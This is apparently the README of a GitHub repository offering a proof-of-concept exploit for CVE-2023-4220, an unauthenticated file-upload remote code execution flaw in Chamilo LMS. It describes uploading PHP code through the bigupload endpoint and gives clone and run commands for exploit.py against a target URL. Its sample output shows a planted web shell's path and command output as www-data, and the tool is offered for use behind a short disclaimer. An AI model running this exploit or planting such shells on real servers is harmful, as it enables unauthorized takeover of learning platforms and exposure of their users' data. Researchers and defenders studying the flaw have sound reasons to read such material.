
(CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution
This repository contains a proof-of-concept (PoC) exploit for the vulnerability identified as CVE-2023-4220 in Chamilo LMS. This exploit leverages an unauthenticated file upload vulnerability, allowing remote attackers to execute arbitrary code on the affected system.
Disclaimer: This code is for educational and research purposes only. The author is not responsible for any misuse of this code.
Chamilo LMS versions prior to this release are vulnerable to this issue. The vulnerability arises from improper validation and handling of file uploads, allowing attackers to upload and execute malicious files on the server.
This exploit targets the file upload functionality in Chamilo LMS. By crafting a malicious file containing PHP code and uploading it through an unauthenticated endpoint, an attacker can execute arbitrary commands on the server.
git clone https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit.git
cd Chamilo-CVE-2023-4220-RCE-Exploit
Run the exploit by passing the target URL and the command you wish to execute as arguments:
python exploit.py <target_url> <command>
python3 exploit.py http://lms.target-site/ id --shell=my_shell.php
This command will:
If successful, the script will output:
For example:
[+] File uploaded successfully!
[+] Access the shell at: http://lms.target-site/main/inc/lib/javascript/bigupload/files/my_shell.php?cmd=
[+] Command Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
This project is licensed under the MIT License.
For any queries or issues, please open an issue on this repository or contact me at [medkamelbouzekria - at - gmail -dot - com].